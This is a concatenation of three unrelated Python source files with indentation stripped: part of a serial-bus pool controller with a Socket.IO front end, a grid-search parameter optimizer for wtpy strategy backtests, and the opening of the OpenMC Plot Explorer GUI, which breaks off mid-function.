# Clear buffer and don't attempt parsing.
serialHandler.reset()
return
frameType = frame[2:4]
data = frame[4:-4]
# Use frame type to determine parsing function
if frameType == FRAME_TYPE_KEEPALIVE:
# Check to see if we have a command to send
if serialHandler.ready_to_send == True:
if commandHandler.keep_alive_count == 1:
# If this is the second sequential keep alive frame, send command
serialHandler.send(commandHandler.full_command)
logging.info(
f'Sent: {commandHandler.parameter}, {commandHandler.full_command}'
)
if commandHandler.confirm == False:
commandHandler.sending_message = False
serialHandler.ready_to_send = False
else:
commandHandler.keep_alive_count = 1
else:
commandHandler.keep_alive_count = 0
else:
# Message is not keep alive
commandHandler.keep_alive_count = 0
if frameType == FRAME_TYPE_DISPLAY:
parseDisplay(data, poolModel)
commandHandler.keep_alive_count = 0
elif frameType == FRAME_TYPE_LEDS:
parseLEDs(data, poolModel)
else:
logging.info(f'Unkown update: {frameType}, {data}')
# Clear buffer and reset flags
serialHandler.reset()
def checkCommand(poolModel, serialHandler, commandHandler):
'''
If we are trying to send a message, wait for a new pool model to get pool states
If necessary, queue message to be sent after second keep alive
Are we currently trying to send a command?
'''
if commandHandler.sending_message == False:
# We aren't trying to send a command
return
if serialHandler.ready_to_send == True:
# We are already ready to send, awaiting keep alive
return
if poolModel.last_update_time >= commandHandler.last_model_time:
# We have a new poolModel
if poolModel.getParameterState(
commandHandler.parameter) == commandHandler.target_state:
# Model matches
logging.info(f'Command success.')
commandHandler.sending_message = False
poolModel.sending_message = False
poolModel.flag_data_changed = True
else:
# New poolModel doesn't match
if commandHandler.checkSendAttempts() == True:
commandHandler.last_model_time = time.time()
serialHandler.ready_to_send = True
def getCommand(poolModel, serialHandler, commandHandler):
'''
If we're not currently sending a command, check if there are new commands.
Get new command from command_queue, validate, and initiate send with commandHandler.
'''
#TODO figure out threading issue or move command_queue to tmp directory
if commandHandler.sending_message == True:
#We are currently trying to send a command, don't need to check for others
return
if exists('command_queue.txt') == False:
return
if stat('command_queue.txt').st_size != 0:
f = open('command_queue.txt', 'r+')
line = f.readline()
# TODO check if this if statement is necessary or if it's redundant with st_size check
try:
if len(line.split(',')) == 4:
# Extract csv command info
commandID = line.split(',')[0]
commandDesiredState = line.split(',')[1]
commandVersion = int(line.split(',')[2])
commandConfirm = line.split(',')[3]
if commandConfirm == '1':
# Command is not a menu button.
# Confirmation if command was successful is needed
# Check against model to see if command state and version are valid
# If valid, add to send queue
# If not, provide feedback to user
if poolModel.getParameterState(commandID) == 'INIT':
logging.error(
f'Invalid command: Target parameter {commandID} is in INIT state.'
)
f.close()
return
else:
if commandVersion == poolModel.getParameterVersion(
commandID):
#Front end and back end versions are synced
#Extra check to ensure we are not already in our desired state
if commandDesiredState == poolModel.getParameterState(
commandID):
logging.error(
f'Invalid command: Target parameter {commandID} is already in target state {commandDesiredState}.'
)
else:
# Command is valid
logging.info(
f'Valid command: {commandID} {commandDesiredState}, version {commandVersion}'
)
#Push to command handler
commandHandler.initiateSend(
commandID, commandDesiredState,
commandConfirm)
poolModel.sending_message = True
else:
logging.error(
f'Invalid command: Target parameter {commandID} version is {poolModel.getParameterVersion(commandID)} but command version is {commandVersion}.'
)
else:
# Command is a menu button
# No confirmation needed. Only send once.
# No check against model states/versions needed.
# Immediately load for sending.
commandHandler.initiateSend(commandID, commandDesiredState,
commandConfirm)
serialHandler.ready_to_send = True
else:
logging.error(
f'Invalid command: Command structure is invalid: {line}')
except Exception as e:
logging.error(
f'Invalid command: Error parsing command: {line}, {e}')
# Clear file contents
f.truncate(0)
f.close()
return
def sendModel(poolModel):
# If we have new date for the front end, send data as JSON
if poolModel.flag_data_changed == True:
socketio.emit('model', poolModel.toJSON())
logging.debug('Sent model')
poolModel.flag_data_changed = False
return
def main():
poolModel = PoolModel()
serialHandler = SerialHandler()
commandHandler = CommandHandler()
if exists('command_queue.txt') == True:
if stat('command_queue.txt').st_size != 0:
f = open('command_queue.txt', 'r+')
f.truncate(0)
f.close()
while (True):
# Read Serial Bus
# If new serial data is available, read from the buffer
readSerialBus(serialHandler)
# Parse Buffer
# If a full serial frame has been found, decode it and update model.
# If we have a command ready to be sent, send.
parseBuffer(poolModel, serialHandler, commandHandler)
# If we are sending a command, check if command needs to be sent.
# Check model for updates to see if command was accepted.
checkCommand(poolModel, serialHandler, commandHandler)
# Send updates to front end.
sendModel(poolModel)
# If we're not sending, check for new commands from front end.
getCommand(poolModel, serialHandler, commandHandler)
if __name__ == '__main__':
# Create log file directory if not already existing
if not exists('logs'):
makedirs('logs')
formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
handler = TimedRotatingFileHandler('logs/pool-pi.log',
when='midnight',
interval=5)
handler.suffix = '%Y-%m-%d_%H-%M-%S'
handler.setFormatter(formatter)
logging.getLogger().handlers.clear()
logging.getLogger().addHandler(handler)
logging.getLogger().setLevel(logging.INFO)
logging.info('Started pool-pi.py')
Thread(
target=lambda: socketio.run(app, debug=False, host='0.0.0.0')).start()
Thread(target=main).start()
|
WtCtaOptimizer.py
|
import multiprocessing
import time
import threading
import json
import os
import math
import numpy as np
import pandas as pd
from pandas import DataFrame as df
from wtpy import WtBtEngine,EngineType
def fmtNAN(val, defVal = 0):
if math.isnan(val):
return defVal
return val
class ParamInfo:
'''
参数信息类
'''
def __init__(self, name:str, start_val = None, end_val = None, step_val = None, ndigits = 1, val_list:list = None):
self.name = name #参数名
self.start_val = start_val #起始值
self.end_val = end_val #结束值
self.step_val = step_val #变化步长
self.ndigits = ndigits #小数位
self.val_list = val_list #指定参数
def gen_array(self):
if self.val_list is not None:
return self.val_list
values = list()
curVal = round(self.start_val, self.ndigits)
while curVal < self.end_val:
values.append(curVal)
curVal += self.step_val
curVal = round(curVal, self.ndigits)
if curVal >= self.end_val:
curVal = self.end_val
break
values.append(round(curVal, self.ndigits))
return values
class WtCtaOptimizer:
'''
参数优化器\n
主要用于做策略参数优化的
'''
def __init__(self, worker_num:int = 8):
'''
构造函数\n
@worker_num 工作进程个数,默认为8,可以根据CPU核心数设置
'''
self.worker_num = worker_num
self.running_worker = 0
self.mutable_params = dict()
self.fixed_params = dict()
self.env_params = dict()
return
def add_mutable_param(self, name:str, start_val, end_val, step_val, ndigits = 1):
'''
添加可变参数\n
@name 参数名\n
@start_val 起始值\n
@end_val 结束值\n
@step_val 步长\n
@ndigits 小数位
'''
self.mutable_params[name] = ParamInfo(name=name, start_val=start_val, end_val=end_val, step_val=step_val, ndigits=ndigits)
def add_listed_param(self, name:str, val_list:list):
'''
添加限定范围的可变参数\n
@name 参数名\n
@val_list 参数值列表
'''
self.mutable_params[name] = ParamInfo(name=name, val_list=val_list)
def add_fixed_param(self, name:str, val):
'''
添加固定参数\n
@name 参数名\n
@val 值\n
'''
self.fixed_params[name] = val
return
def set_strategy(self, typeName:type, name_prefix:str):
'''
设置策略\n
@typeName 策略类名\n
@name_prefix 命名前缀,用于自动命名用,一般为格式为"前缀_参数1名_参数1值_参数2名_参数2值"
'''
self.strategy_type = typeName
self.name_prefix = name_prefix
return
def config_backtest_env(self, deps_dir:str, cfgfile:str="configbt.json", storage_type:str="csv", storage_path:str = None, db_config:dict = None):
'''
配置回测环境\n
@deps_dir 依赖文件目录\n
@cfgfile 配置文件名\n
@storage_type 存储类型,csv/bin等\n
@storage_path 存储路径
'''
self.env_params["deps_dir"] = deps_dir
self.env_params["cfgfile"] = cfgfile
self.env_params["storage_type"] = storage_type
if storage_path is None and db_config is None:
raise Exception("storage_path and db_config cannot be both None!")
if storage_type == 'db' and db_config is None:
raise Exception("db_config cannot be None while storage_type is db!")
self.env_params["storage_path"] = storage_path
self.env_params["db_config"] = db_config
def config_backtest_time(self, start_time:int, end_time:int):
'''
配置回测时间\n
@start_time 开始时间,精确到分钟,格式如201909100930\n
@end_time 结束时间,精确到分钟,格式如201909100930
'''
self.env_params["start_time"] = start_time
self.env_params["end_time"] = end_time
def __gen_tasks__(self, markerfile:str = "strategies.json"):
'''
生成回测任务
'''
param_names = self.mutable_params.keys()
param_values = dict()
# 先生成各个参数的变量数组
# 并计算总的参数有多少组
total_groups = 1
for name in param_names:
paramInfo = self.mutable_params[name]
values = paramInfo.gen_array()
param_values[name] = values
total_groups *= len(values)
#再生成最终每一组的参数dict
param_groups = list()
stra_names = dict()
for i in range(total_groups):
k = i
thisGrp = self.fixed_params.copy() #复制固定参数
endix = ''
for name in param_names:
cnt = len(param_values[name])
curVal = param_values[name][k%cnt]
thisGrp[name] = curVal
endix += name
endix += "_"
endix += str(curVal)
endix += "_"
k = math.floor(k / cnt)
endix = endix[:-1]
straName = self.name_prefix + endix
thisGrp["name"] = straName
stra_names[straName] = thisGrp
param_groups.append(thisGrp)
# 将每一组参数和对应的策略ID落地到文件中,方便后续的分析
f = open(markerfile, "w")
f.write(json.dumps(obj=stra_names, sort_keys=True, indent=4))
f.close()
return param_groups
def __ayalyze_result__(self, strName:str, params:dict):
folder = "./outputs_bt/%s/" % (strName)
df_closes = pd.read_csv(folder + "closes.csv")
df_funds = pd.read_csv(folder + "funds.csv")
df_wins = df_closes[df_closes["profit"]>0]
df_loses = df_closes[df_closes["profit"]<=0]
ay_WinnerBarCnts = df_wins["closebarno"]-df_wins["openbarno"]
ay_LoserBarCnts = df_loses["closebarno"]-df_loses["openbarno"]
total_winbarcnts = ay_WinnerBarCnts.sum()
total_losebarcnts = ay_LoserBarCnts.sum()
total_fee = df_funds.iloc[-1]["fee"]
totaltimes = len(df_closes) # 总交易次数
wintimes = len(df_wins) # 盈利次数
losetimes = len(df_loses) # 亏损次数
winamout = df_wins["profit"].sum() #毛盈利
loseamount = df_loses["profit"].sum() #毛亏损
trdnetprofit = winamout + loseamount #交易净盈亏
accnetprofit = trdnetprofit - total_fee #账户净盈亏
winrate = wintimes / totaltimes if totaltimes>0 else 0 # 胜率
avgprof = trdnetprofit/totaltimes if totaltimes>0 else 0 # 单次平均盈亏
avgprof_win = winamout/wintimes if wintimes>0 else 0 # 单次盈利均值
avgprof_lose = loseamount/losetimes if losetimes>0 else 0 # 单次亏损均值
winloseratio = abs(avgprof_win/avgprof_lose) if avgprof_lose!=0 else "N/A" # 单次盈亏均值比
max_consecutive_wins = 0 # 最大连续盈利次数
max_consecutive_loses = 0 # 最大连续亏损次数
avg_bars_in_winner = total_winbarcnts/wintimes if wintimes>0 else "N/A"
avg_bars_in_loser = total_losebarcnts/losetimes if losetimes>0 else "N/A"
consecutive_wins = 0
consecutive_loses = 0
for idx, row in df_closes.iterrows():
profit = row["profit"]
if profit > 0:
consecutive_wins += 1
consecutive_loses = 0
else:
consecutive_wins = 0
consecutive_loses += 1
max_consecutive_wins = max(max_consecutive_wins, consecutive_wins)
max_consecutive_loses = max(max_consecutive_loses, consecutive_loses)
summary = params.copy()
summary["Total Trades"] = totaltimes
summary["Winning Trades"] = wintimes
summary["Losing Trades"] = losetimes
summary["Gross Profit"] = float(winamout)
summary["Gross Loss"] = float(loseamount)
summary["Net Profit"] = float(trdnetprofit)
summary["% Profitable"] = winrate*100
summary["Avg Trade"] = avgprof
summary["Avg Winning Trade"] = avgprof_win
summary["Avg Losing Trade"] = avgprof_lose
summary["Win/Loss Ratio"] = winloseratio
summary["Max Consecutive Winners"] = max_consecutive_wins
summary["Max Consecutive Losers"] = max_consecutive_loses
summary["Avg Bars in Winner"] = avg_bars_in_winner
summary["Avg Bars in Loser"] = avg_bars_in_loser
summary["Return on Account"] = accnetprofit/totaltimes
f = open(folder+"summary.json", "w")
f.write(json.dumps(obj=summary, indent=4))
f.close()
return
def __execute_task__(self, params:dict):
'''
执行单个回测任务\n
@params kv形式的参数
'''
name = params["name"]
f = open("logcfg_tpl.json", "r")
content =f.read()
f.close()
content = content.replace("$NAME$", name)
engine = WtBtEngine(eType=EngineType.ET_CTA, logCfg=content, isFile=False)
engine.init(self.env_params["deps_dir"], self.env_params["cfgfile"])
engine.configBacktest(self.env_params["start_time"],self.env_params["end_time"])
engine.configBTStorage(mode=self.env_params["storage_type"], path=self.env_params["storage_path"], dbcfg=self.env_params["db_config"])
engine.commitBTConfig()
straInfo = self.strategy_type(**params)
engine.set_cta_strategy(straInfo)
engine.run_backtest()
engine.release_backtest()
self.__ayalyze_result__(name, params)
def __start_task__(self, params:dict):
'''
启动单个回测任务\n
这里用线程启动子进程的目的是为了可以控制总的工作进程个数\n
可以在线程中join等待子进程结束,再更新running_worker变量\n
如果在__execute_task__中修改running_worker,因为在不同进程中,数据并不同步\n
@params kv形式的参数
'''
p = multiprocessing.Process(target=self.__execute_task__, args=(params,))
p.start()
p.join()
self.running_worker -= 1
print("工作进程%d个" % (self.running_worker))
def go(self, interval:float = 0.2, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
'''
启动优化器\n
@interval 时间间隔,单位秒
@markerfile 标记文件名,回测完成以后分析会用到
'''
self.tasks = self.__gen_tasks__(out_marker_file)
self.running_worker = 0
total_task = len(self.tasks)
left_task = total_task
while True:
if left_task == 0:
break
if self.running_worker < self.worker_num:
params = self.tasks[total_task-left_task]
left_task -= 1
print("剩余任务%d个" % (left_task))
p = threading.Thread(target=self.__start_task__, args=(params,))
p.start()
self.running_worker += 1
print("工作进程%d个" % (self.running_worker))
else:
time.sleep(interval)
#最后,全部任务都已经启动完了,再等待所有工作进程结束
while True:
if self.running_worker == 0:
break
else:
time.sleep(interval)
#开始汇总回测结果
f = open(out_marker_file, "r")
content = f.read()
f.close()
obj_stras = json.loads(content)
total_summary = list()
for straName in obj_stras:
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%s不存在,请检查数据" % (filename))
continue
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
def analyze(self, out_marker_file:str = "strategies.json", out_summary_file:str = "total_summary.csv"):
#开始汇总回测结果
f = open(out_marker_file, "r")
content = f.read()
f.close()
total_summary = list()
obj_stras = json.loads(content)
for straName in obj_stras:
params = obj_stras[straName]
filename = "./outputs_bt/%s/summary.json" % (straName)
if not os.path.exists(filename):
print("%s不存在,请检查数据" % (filename))
continue
self.__ayalyze_result__(straName, params)
f = open(filename, "r")
content = f.read()
f.close()
obj_summary = json.loads(content)
total_summary.append(obj_summary)
df_summary = df(total_summary)
df_summary = df_summary.drop(labels=["name"], axis='columns')
df_summary.to_csv(out_summary_file)
|
main_window.py
|
import copy
from functools import partial
import os
import pickle
from threading import Thread
from PySide2 import QtCore, QtGui
from PySide2.QtGui import QKeyEvent
from PySide2.QtWidgets import (QApplication, QLabel, QSizePolicy, QMainWindow,
QScrollArea, QMessageBox, QAction, QFileDialog,
QColorDialog, QInputDialog, QWidget,
QGestureEvent)
import openmc
import openmc.lib
try:
import vtk
_HAVE_VTK = True
except ImportError:
_HAVE_VTK = False
from .plotmodel import PlotModel, DomainTableModel
from .plotgui import PlotImage, ColorDialog
from .docks import DomainDock, TallyDock
from .overlays import ShortcutsOverlay
from .tools import ExportDataDialog
_COORD_LEVELS = 0
def _openmcReload():
# reset OpenMC memory, instances
openmc.lib.reset()
openmc.lib.finalize()
# initialize geometry (for volume calculation)
openmc.lib.settings.output_summary = False
openmc.lib.init(["-c"])
class MainWindow(QMainWindow):
def __init__(self, font=QtGui.QFontMetrics(QtGui.QFont()), screen_size=QtCore.QSize()):
super().__init__()
self.screen = screen_size
self.font_metric = font
self.setWindowTitle('OpenMC Plot Explorer')
def loadGui(self):
self.pixmap = None
self.zoom = 100
self.loadModel()
# Create viewing area
self.frame = QScrollArea(self)
cw = QWidget()
self.frame.setCornerWidget(cw)
self.frame.setAlignment(QtCore.Qt.AlignCenter)
self.frame.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(self.frame)
# connect pinch gesture (OSX)
self.grabGesture(QtCore.Qt.PinchGesture)
# Create plot image
self.plotIm = PlotImage(self.model, self.frame, self)
self.frame.setWidget(self.plotIm)
# Dock
self.dock = DomainDock(self.model, self.font_metric, self)
self.dock.setObjectName("Domain Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.dock)
# Tally Dock
self.tallyDock = TallyDock(self.model, self.font_metric, self)
self.tallyDock.update()
self.tallyDock.setObjectName("Tally Options Dock")
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tallyDock)
# Color DialogtallyDock
self.colorDialog = ColorDialog(self.model, self.font_metric, self)
self.colorDialog.hide()
# Tools
self.exportDataDialog = ExportDataDialog(self.model, self.font_metric, self)
# Restore Window Settings
self.restoreWindowSettings()
# Create menubar
self.createMenuBar()
self.updateEditMenu()
# Status Bar
self.coord_label = QLabel()
self.statusBar().addPermanentWidget(self.coord_label)
self.coord_label.hide()
# Keyboard overlay
self.shortcutOverlay = ShortcutsOverlay(self)
self.shortcutOverlay.hide()
# Load Plot
self.statusBar().showMessage('Generating Plot...')
self.dock.updateDock()
self.tallyDock.update()
self.colorDialog.updateDialogValues()
self.statusBar().showMessage('')
# Timer allows GUI to render before plot finishes loading
QtCore.QTimer.singleShot(0, self.plotIm.generatePixmap)
QtCore.QTimer.singleShot(0, self.showCurrentView)
def event(self, event):
# use pinch event to update zoom
if isinstance(event, QGestureEvent):
pinch = event.gesture(QtCore.Qt.PinchGesture)
self.editZoom(self.zoom * pinch.scaleFactor())
if isinstance(event, QKeyEvent) and hasattr(self, "shortcutOverlay"):
self.shortcutOverlay.event(event)
return super().event(event)
def show(self):
super().show()
self.plotIm._resize()
def toggleShortcuts(self):
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.close()
else:
self.shortcutOverlay.move(0, 0)
self.shortcutOverlay.resize(self.width(), self.height())
self.shortcutOverlay.show()
# Create and update menus:
def createMenuBar(self):
self.mainMenu = self.menuBar()
# File Menu
self.reloadModelAction = QAction("&Reload model...", self)
self.reloadModelAction.setShortcut("Ctrl+Shift+R")
self.reloadModelAction.setToolTip("Reload current model")
self.reloadModelAction.setStatusTip("Reload current model")
reload_connector = partial(self.loadModel, reload=True)
self.reloadModelAction.triggered.connect(reload_connector)
self.saveImageAction = QAction("&Save Image As...", self)
self.saveImageAction.setShortcut("Ctrl+Shift+S")
self.saveImageAction.setToolTip('Save plot image')
self.saveImageAction.setStatusTip('Save plot image')
self.saveImageAction.triggered.connect(self.saveImage)
self.saveViewAction = QAction("Save &View...", self)
self.saveViewAction.setShortcut(QtGui.QKeySequence.Save)
self.saveViewAction.setStatusTip('Save current view settings')
self.saveViewAction.triggered.connect(self.saveView)
self.openAction = QAction("&Open View...", self)
self.openAction.setShortcut(QtGui.QKeySequence.Open)
self.openAction.setToolTip('Open saved view settings')
self.openAction.setStatusTip('Open saved view settings')
self.openAction.triggered.connect(self.openView)
self.quitAction = QAction("&Quit", self)
self.quitAction.setShortcut(QtGui.QKeySequence.Quit)
self.quitAction.setToolTip('Quit OpenMC Plot Explorer')
self.quitAction.setStatusTip('Quit OpenMC Plot Explorer')
self.quitAction.triggered.connect(self.close)
self.exportDataAction = QAction('E&xport...', self)
self.exportDataAction.setToolTip('Export model and tally data VTK')
self.setStatusTip('Export current model and tally data to VTK')
self.exportDataAction.triggered.connect(self.exportTallyData)
if not _HAVE_VTK:
self.exportDataAction.setEnabled(False)
self.exportDataAction.setToolTip("Disabled: VTK Python module is not installed")
self.fileMenu = self.mainMenu.addMenu('&File')
self.fileMenu.addAction(self.reloadModelAction)
self.fileMenu.addAction(self.saveImageAction)
self.fileMenu.addAction(self.exportDataAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.saveViewAction)
self.fileMenu.addAction(self.openAction)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAction)
# Data Menu
self.openStatePointAction = QAction("&Open statepoint...", self)
self.openStatePointAction.setToolTip('Open statepoint file')
self.openStatePointAction.triggered.connect(self.openStatePoint)
self.dataMenu = self.mainMenu.addMenu('D&ata')
self.dataMenu.addAction(self.openStatePointAction)
self.updateDataMenu()
# Edit Menu
self.applyAction = QAction("&Apply Changes", self)
self.applyAction.setShortcut("Ctrl+Return")
self.applyAction.setToolTip('Generate new view with changes applied')
self.applyAction.setStatusTip('Generate new view with changes applied')
self.applyAction.triggered.connect(self.applyChanges)
self.undoAction = QAction('&Undo', self)
self.undoAction.setShortcut(QtGui.QKeySequence.Undo)
self.undoAction.setToolTip('Undo')
self.undoAction.setStatusTip('Undo last plot view change')
self.undoAction.setDisabled(True)
self.undoAction.triggered.connect(self.undo)
self.redoAction = QAction('&Redo', self)
self.redoAction.setDisabled(True)
self.redoAction.setToolTip('Redo')
self.redoAction.setStatusTip('Redo last plot view change')
self.redoAction.setShortcut(QtGui.QKeySequence.Redo)
self.redoAction.triggered.connect(self.redo)
self.restoreAction = QAction("&Restore Default Plot", self)
self.restoreAction.setShortcut("Ctrl+R")
self.restoreAction.setToolTip('Restore to default plot view')
self.restoreAction.setStatusTip('Restore to default plot view')
self.restoreAction.triggered.connect(self.restoreDefault)
self.editMenu = self.mainMenu.addMenu('&Edit')
self.editMenu.addAction(self.applyAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.undoAction)
self.editMenu.addAction(self.redoAction)
self.editMenu.addSeparator()
self.editMenu.addAction(self.restoreAction)
self.editMenu.addSeparator()
self.editMenu.aboutToShow.connect(self.updateEditMenu)
# Edit -> Basis Menu
self.xyAction = QAction('&xy ', self)
self.xyAction.setCheckable(True)
self.xyAction.setShortcut('Alt+X')
self.xyAction.setToolTip('Change to xy basis')
self.xyAction.setStatusTip('Change to xy basis')
xy_connector = partial(self.editBasis, 'xy', apply=True)
self.xyAction.triggered.connect(xy_connector)
self.xzAction = QAction('x&z ', self)
self.xzAction.setCheckable(True)
self.xzAction.setShortcut('Alt+Z')
self.xzAction.setToolTip('Change to xz basis')
self.xzAction.setStatusTip('Change to xz basis')
xz_connector = partial(self.editBasis, 'xz', apply=True)
self.xzAction.triggered.connect(xz_connector)
self.yzAction = QAction('&yz ', self)
self.yzAction.setCheckable(True)
self.yzAction.setShortcut('Alt+Y')
self.yzAction.setToolTip('Change to yz basis')
self.yzAction.setStatusTip('Change to yz basis')
yz_connector = partial(self.editBasis, 'yz', apply=True)
self.yzAction.triggered.connect(yz_connector)
self.basisMenu = self.editMenu.addMenu('&Basis')
self.basisMenu.addAction(self.xyAction)
self.basisMenu.addAction(self.xzAction)
self.basisMenu.addAction(self.yzAction)
self.basisMenu.aboutToShow.connect(self.updateBasisMenu)
# Edit -> Color By Menu
self.cellAction = QAction('&Cell', self)
self.cellAction.setCheckable(True)
self.cellAction.setShortcut('Alt+C')
self.cellAction.setToolTip('Color by cell')
self.cellAction.setStatusTip('Color plot by cell')
cell_connector = partial(self.editColorBy, 'cell', apply=True)
self.cellAction.triggered.connect(cell_connector)
self.materialAction = QAction('&Material', self)
self.materialAction.setCheckable(True)
self.materialAction.setShortcut('Alt+M')
self.materialAction.setToolTip('Color by material')
self.materialAction.setStatusTip('Color plot by material')
material_connector = partial(self.editColorBy, 'material', apply=True)
self.materialAction.triggered.connect(material_connector)
self.temperatureAction = QAction('&Temperature', self)
self.temperatureAction.setCheckable(True)
self.temperatureAction.setShortcut('Alt+T')
self.temperatureAction.setToolTip('Color by temperature')
self.temperatureAction.setStatusTip('Color plot by temperature')
temp_connector = partial(self.editColorBy, 'temperature', apply=True)
self.temperatureAction.triggered.connect(temp_connector)
self.densityAction = QAction('&Density', self)
self.densityAction.setCheckable(True)
self.densityAction.setShortcut('Alt+D')
self.densityAction.setToolTip('Color by density')
self.densityAction.setStatusTip('Color plot by density')
density_connector = partial(self.editColorBy, 'density', apply=True)
self.densityAction.triggered.connect(density_connector)
self.colorbyMenu = self.editMenu.addMenu('&Color By')
self.colorbyMenu.addAction(self.cellAction)
self.colorbyMenu.addAction(self.materialAction)
self.colorbyMenu.addAction(self.temperatureAction)
self.colorbyMenu.addAction(self.densityAction)
self.colorbyMenu.aboutToShow.connect(self.updateColorbyMenu)
self.editMenu.addSeparator()
# Edit -> Other Options
self.maskingAction = QAction('Enable &Masking', self)
self.maskingAction.setShortcut('Ctrl+M')
self.maskingAction.setCheckable(True)
self.maskingAction.setToolTip('Toggle masking')
self.maskingAction.setStatusTip('Toggle whether masking is enabled')
masking_connector = partial(self.toggleMasking, apply=True)
self.maskingAction.toggled.connect(masking_connector)
self.editMenu.addAction(self.maskingAction)
self.highlightingAct = QAction('Enable High&lighting', self)
self.highlightingAct.setShortcut('Ctrl+L')
self.highlightingAct.setCheckable(True)
self.highlightingAct.setToolTip('Toggle highlighting')
self.highlightingAct.setStatusTip('Toggle whether '
'highlighting is enabled')
highlight_connector = partial(self.toggleHighlighting, apply=True)
self.highlightingAct.toggled.connect(highlight_connector)
self.editMenu.addAction(self.highlightingAct)
self.overlapAct = QAction('Enable Overlap Coloring', self)
self.overlapAct.setShortcut('Ctrl+P')
self.overlapAct.setCheckable(True)
self.overlapAct.setToolTip('Toggle overlapping regions')
self.overlapAct.setStatusTip('Toggle display of overlapping '
'regions when enabled')
overlap_connector = partial(self.toggleOverlaps, apply=True)
self.overlapAct.toggled.connect(overlap_connector)
self.editMenu.addAction(self.overlapAct)
self.outlineAct = QAction('Enable Domain Outlines', self)
self.outlineAct.setShortcut('Ctrl+U')
self.outlineAct.setCheckable(True)
self.outlineAct.setToolTip('Display Cell/Material Boundaries')
self.outlineAct.setStatusTip('Toggle display of domain '
'outlines when enabled')
outline_connector = partial(self.toggleOutlines, apply=True)
self.outlineAct.toggled.connect(outline_connector)
self.editMenu.addAction(self.outlineAct)
# View Menu
self.dockAction = QAction('Hide &Dock', self)
self.dockAction.setShortcut("Ctrl+D")
self.dockAction.setToolTip('Toggle dock visibility')
self.dockAction.setStatusTip('Toggle dock visibility')
self.dockAction.triggered.connect(self.toggleDockView)
self.tallyDockAction = QAction('Tally &Dock', self)
self.tallyDockAction.setShortcut("Ctrl+T")
self.tallyDockAction.setToolTip('Toggle tally dock visibility')
self.tallyDockAction.setStatusTip('Toggle tally dock visibility')
self.tallyDockAction.triggered.connect(self.toggleTallyDockView)
self.zoomAction = QAction('&Zoom...', self)
self.zoomAction.setShortcut('Alt+Shift+Z')
self.zoomAction.setToolTip('Edit zoom factor')
self.zoomAction.setStatusTip('Edit zoom factor')
self.zoomAction.triggered.connect(self.editZoomAct)
self.viewMenu = self.mainMenu.addMenu('&View')
self.viewMenu.addAction(self.dockAction)
self.viewMenu.addAction(self.tallyDockAction)
self.viewMenu.addSeparator()
self.viewMenu.addAction(self.zoomAction)
self.viewMenu.aboutToShow.connect(self.updateViewMenu)
# Window Menu
self.mainWindowAction = QAction('&Main Window', self)
self.mainWindowAction.setCheckable(True)
self.mainWindowAction.setToolTip('Bring main window to front')
self.mainWindowAction.setStatusTip('Bring main window to front')
self.mainWindowAction.triggered.connect(self.showMainWindow)
self.colorDialogAction = QAction('Color &Options', self)
self.colorDialogAction.setCheckable(True)
self.colorDialogAction.setToolTip('Bring Color Dialog to front')
self.colorDialogAction.setStatusTip('Bring Color Dialog to front')
self.colorDialogAction.triggered.connect(self.showColorDialog)
# Keyboard Shortcuts Overlay
self.keyboardShortcutsAction = QAction("&Keyboard Shortcuts...", self)
self.keyboardShortcutsAction.setShortcut("?")
self.keyboardShortcutsAction.setToolTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.setStatusTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.triggered.connect(self.toggleShortcuts)
self.windowMenu = self.mainMenu.addMenu('&Window')
self.windowMenu.addAction(self.mainWindowAction)
self.windowMenu.addAction(self.colorDialogAction)
self.windowMenu.addAction(self.keyboardShortcutsAction)
self.windowMenu.aboutToShow.connect(self.updateWindowMenu)
def updateEditMenu(self):
changed = self.model.currentView != self.model.defaultView
self.restoreAction.setDisabled(not changed)
self.maskingAction.setChecked(self.model.currentView.masking)
self.highlightingAct.setChecked(self.model.currentView.highlighting)
self.outlineAct.setChecked(self.model.currentView.outlines)
num_previous_views = len(self.model.previousViews)
self.undoAction.setText('&Undo ({})'.format(num_previous_views))
num_subsequent_views = len(self.model.subsequentViews)
self.redoAction.setText('&Redo ({})'.format(num_subsequent_views))
def updateBasisMenu(self):
self.xyAction.setChecked(self.model.currentView.basis == 'xy')
self.xzAction.setChecked(self.model.currentView.basis == 'xz')
self.yzAction.setChecked(self.model.currentView.basis == 'yz')
def updateColorbyMenu(self):
cv = self.model.currentView
self.cellAction.setChecked(cv.colorby == 'cell')
self.materialAction.setChecked(cv.colorby == 'material')
self.temperatureAction.setChecked(cv.colorby == 'temperature')
self.densityAction.setChecked(cv.colorby == 'density')
def updateViewMenu(self):
if self.dock.isVisible():
self.dockAction.setText('Hide &Dock')
else:
self.dockAction.setText('Show &Dock')
def updateWindowMenu(self):
self.colorDialogAction.setChecked(self.colorDialog.isActiveWindow())
self.mainWindowAction.setChecked(self.isActiveWindow())
# Menu and shared methods
def loadModel(self, reload=False):
if reload:
self.resetModels()
else:
# create new plot model
self.model = PlotModel()
self.restoreModelSettings()
# update plot and model settings
self.updateRelativeBases()
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
if reload:
loader_thread = Thread(target=_openmcReload)
loader_thread.start()
while loader_thread.is_alive():
self.statusBar().showMessage("Reloading model...")
QApplication.processEvents()
self.plotIm.model = self.model
self.applyChanges()
def saveImage(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save Plot Image",
"untitled",
"Images (*.png)")
if filename:
if "." not in filename:
filename += ".png"
self.plotIm.figure.savefig(filename, transparent=True)
self.statusBar().showMessage('Plot Image Saved', 5000)
def saveView(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save View Settings",
